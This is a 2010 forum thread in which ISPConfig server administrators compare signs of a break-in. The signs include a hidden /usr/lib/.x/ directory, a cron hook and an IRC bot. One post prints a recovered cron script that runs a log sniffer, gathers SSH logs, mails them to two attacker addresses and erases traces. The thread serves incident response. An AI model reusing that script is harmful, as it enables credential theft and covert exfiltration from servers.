Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 3 > General

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #1  
Old 1st March 2010, 23:44
SamTzu SamTzu is offline
HowtoForge Supporter
 
Join Date: Apr 2007
Location: Helsinki
Posts: 438
Thanks: 34
Thanked 56 Times in 39 Posts
Send a message via Skype™ to SamTzu
Exclamation Hacked!!!

Posting this quickly so that others can check their systems for signs.
ls -ahl /usr/lib/.x/

If that shows you files on your server you have been hacked just like we seem to have been on serveral servers. (All ISPConfig3 servers.)

Powered by ISPConfig 3.0.1.6

Debian Lenny 5.0.3 (OpenVz) Proxmox 1.4
Linux server44 2.6.24-7-pve #1 SMP PREEMPT Tue Jun 2 08:00:29 CEST 2009 i686


Seems like some kind of IRC Bot.
__________________

Sami Mattila
Internet-Content

Telephone:
00358942833310
Email: firstname.lastname@internet-content.org
Shop: http://shop.internet-content.net
Site: http://www.internet-content.net
Blog: http://www.internet-content.net/en/blog
FB: https://www.facebook.com/internetcontent

Reply With Quote
Sponsored Links
  #2  
Old 1st March 2010, 23:58
edge edge is offline
Moderator
 
Join Date: Dec 2005
Location: The Netherlands
Posts: 2,042
Thanks: 269
Thanked 154 Times in 133 Posts
Default

All my Debian Lenny servers (with ISPconfig3) are okay.
Quote:
ls -ahl /usr/lib/.x/
ls: cannot access /usr/lib/.x/: No such file or directory
__________________
Never execute code written on a Friday or a Monday.

Last edited by edge; 2nd March 2010 at 00:01.
Reply With Quote
  #3  
Old 2nd March 2010, 00:00
SamTzu SamTzu is offline
HowtoForge Supporter
 
Join Date: Apr 2007
Location: Helsinki
Posts: 438
Thanks: 34
Thanked 56 Times in 39 Posts
Send a message via Skype™ to SamTzu
Default

(Uups spoke too soon!! Looks like Ubuntu 8.04 LTS / ISPConfig 2's are also vulnerable.)
Also found them in Debian 5.0.3 / ISPConfig 3's so far.

If your server has been used to hack other servers you can see something like this in 'name'.seen file.

server.name.com none 1267130228 2 Quit: I'll get you for this!!!
m1n2b3b3b m1n2b3b3b!~l3iliboi@161.253.129.67 none 1267471837 3 l3iliboi--
l3iliboi`- l3iliboi`-!~l3iliboi@l3iliboi.users.undernet.org none 1267392327 3 l3iliboi
l3iliboi l3iliboi!~l3iliboi@l3iliboi.users.undernet.org none 1267426060 2 Read error: Operation timed out

Also crontab -e will show your crontab emty execpt a command that will call /usr/lib/.x/update file.
__________________

Sami Mattila
Internet-Content

Telephone:
00358942833310
Email: firstname.lastname@internet-content.org
Shop: http://shop.internet-content.net
Site: http://www.internet-content.net
Blog: http://www.internet-content.net/en/blog
FB: https://www.facebook.com/internetcontent


Last edited by SamTzu; 2nd March 2010 at 00:32.
Reply With Quote
  #4  
Old 2nd March 2010, 01:06
SamTzu SamTzu is offline
HowtoForge Supporter
 
Join Date: Apr 2007
Location: Helsinki
Posts: 438
Thanks: 34
Thanked 56 Times in 39 Posts
Send a message via Skype™ to SamTzu
Default

The plot thickens.
This was recovered on one of our tests servers that has ISPconfig2 on Ubuntu 8.04 LTS.

They used /etc/cron.daily/dnsquery:

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log >> test
echo "$(uptime)" >> test
rm -rf httpd.log
echo "named.sn"
cat /usr/lib/named/named.sn >> test
rm -rf /usr/lib/named/named.sn
cd /usr/lib/named
./clean
./cleanssh
echo "ssh.log" >> /usr/lib/test
cat ssh.log >> /usr/lib/test
cd /usr/lib/
mail thelinuxpinguin@yahoo.com -s "$(hostname -f)" < test
mail stormuletzz@yahoo.ca -s "$(hostname -f)" < test
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
__________________

Sami Mattila
Internet-Content

Telephone:
00358942833310
Email: firstname.lastname@internet-content.org
Shop: http://shop.internet-content.net
Site: http://www.internet-content.net
Blog: http://www.internet-content.net/en/blog
FB: https://www.facebook.com/internetcontent


Last edited by SamTzu; 2nd March 2010 at 01:13.
Reply With Quote
  #5  
Old 2nd March 2010, 01:35
edge edge is offline
Moderator
 
Join Date: Dec 2005
Location: The Netherlands
Posts: 2,042
Thanks: 269
Thanked 154 Times in 133 Posts
Default

So.. Any fix for this?
__________________
Never execute code written on a Friday or a Monday.
Reply With Quote
  #6  
Old 2nd March 2010, 01:48
edge edge is offline
Moderator
 
Join Date: Dec 2005
Location: The Netherlands
Posts: 2,042
Thanks: 269
Thanked 154 Times in 133 Posts
Default

Looks like an old hack from 2006
See: http://ubuntuforums.org/showthread.php?t=221922
Page 2 will show the exact same code as you posted.
__________________
Never execute code written on a Friday or a Monday.
Reply With Quote
  #7  
Old 2nd March 2010, 02:42
SamTzu SamTzu is offline
HowtoForge Supporter
 
Join Date: Apr 2007
Location: Helsinki
Posts: 438
Thanks: 34
Thanked 56 Times in 39 Posts
Send a message via Skype™ to SamTzu
Default

That was only one of the hack's on the test server.

The ones that I'm worried about are the ones that were on ns3 and ns5.
Those were minimal Debian / ISPC3 servers.

They only contained LAMP stuff without any clients. Not even FTP.
__________________

Sami Mattila
Internet-Content

Telephone:
00358942833310
Email: firstname.lastname@internet-content.org
Shop: http://shop.internet-content.net
Site: http://www.internet-content.net
Blog: http://www.internet-content.net/en/blog
FB: https://www.facebook.com/internetcontent

Reply With Quote
  #8  
Old 2nd March 2010, 09:27
damir damir is offline
Senior Member
 
Join Date: Jun 2006
Posts: 375
Thanks: 11
Thanked 51 Times in 42 Posts
Default

SamTzu, this is always a bitch but can you give us some information like is this single server running all the services or is it multi server environment? Was your server patched? Are you using firewall? Do you allow your customers ssh access? How do you access server? Have you done any hardening of the server? Have the accessed server through website or some exploit?
Reply With Quote
  #9  
Old 2nd March 2010, 09:38
edge edge is offline
Moderator
 
Join Date: Dec 2005
Location: The Netherlands
Posts: 2,042
Thanks: 269
Thanked 154 Times in 133 Posts
Default

Quote:
Originally Posted by SamTzu View Post
That was only one of the hack's on the test server.

The ones that I'm worried about are the ones that were on ns3 and ns5.
Those were minimal Debian / ISPC3 servers.

They only contained LAMP stuff without any clients. Not even FTP.
Did you also have "Horde web mail" on it as test?
__________________
Never execute code written on a Friday or a Monday.
Reply With Quote
  #10  
Old 2nd March 2010, 09:44
SamTzu SamTzu is offline
HowtoForge Supporter
 
Join Date: Apr 2007
Location: Helsinki
Posts: 438
Thanks: 34
Thanked 56 Times in 39 Posts
Send a message via Skype™ to SamTzu
 
Default

Nope.

As I said before...
What I'm really worried about is that 2 of the 7 hacked servers had almost no installed services and no other users.
(No Email or FTP service installed.)

That points the vulnerability (if there is one) to either Debian/Ubuntu LAMP or ISPConfig.

Either way it's not good.
We are still working on weather it was a weak password or a vulnerability.
What's worse is that it looks like a 'script kiddie' type of hack. They were not too clever in covering their tracks.
Missing cron jobs and history are pretty obvious clues.
If this is a vulnerability it means that this vulnerability is easily available.
__________________

Sami Mattila
Internet-Content

Telephone:
00358942833310
Email: firstname.lastname@internet-content.org
Shop: http://shop.internet-content.net
Site: http://www.internet-content.net
Blog: http://www.internet-content.net/en/blog
FB: https://www.facebook.com/internetcontent


Last edited by SamTzu; 2nd March 2010 at 09:50.
Reply With Quote
Reply

Bookmarks

Tags
debian, hacked, irc, ispconfig3, lenny

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
hELP WITH HACKED WEBSITE PLS spytron Server Operation 1 12th October 2009 17:29
My ISPConfig got hacked nsansari General 1 7th September 2009 14:01
Urgent need help my server is hacked !!!! zinovsky Server Operation 3 5th February 2009 18:23
Have I Been Hacked? :-o PierreQuebec Server Operation 11 8th April 2008 10:24
hacked by By BeLa & BodyguarD shajazzi HOWTO-Related Questions 2 26th April 2007 00:49


All times are GMT +2. The time now is 03:37.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.